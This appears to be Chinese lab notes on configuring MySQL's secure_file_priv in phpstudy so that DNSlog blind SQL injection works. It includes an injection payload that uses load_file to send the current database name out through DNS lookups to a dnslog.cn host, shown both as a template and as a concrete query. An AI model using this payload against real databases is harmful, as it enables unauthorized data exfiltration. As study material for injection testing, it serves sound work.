按照网上的教程在mysql.ini中最后一行添加 secure_file_priv='' 之后,仍然报错。
解决办法:
将 ecure_file_priv='' 置于中间位置,位于m开头的下方,如下图所示:
修改完成之后重启phpstudy的mysql数据库。
判断mysql这项配置secure_file_priv='' 是否开启,输入命令:show variables like '%secure%'
dnslog盲注利用条件(利用dns解析日志):
mysql.ini中secure_file_priv=''必须为空
- secure_file_priv= null 不允许导入和导出
- secure_file_priv= 路径 导入到设置的路径中
- secure_file_priv= '' 导入和导出不做限制
payload:查询语句 and load_file(concat("\\\\",(select database()),'.dnslog的网址\\abc'))
select * from users where id=1 and (select load_file(concat('\\\\',(select database()),'.944559.dnslog.cn\\abc')))
注:
mysql.ini中secure_file_priv='' 和mysql.ini中secure_file_priv=或者secure_file_priv=""都可以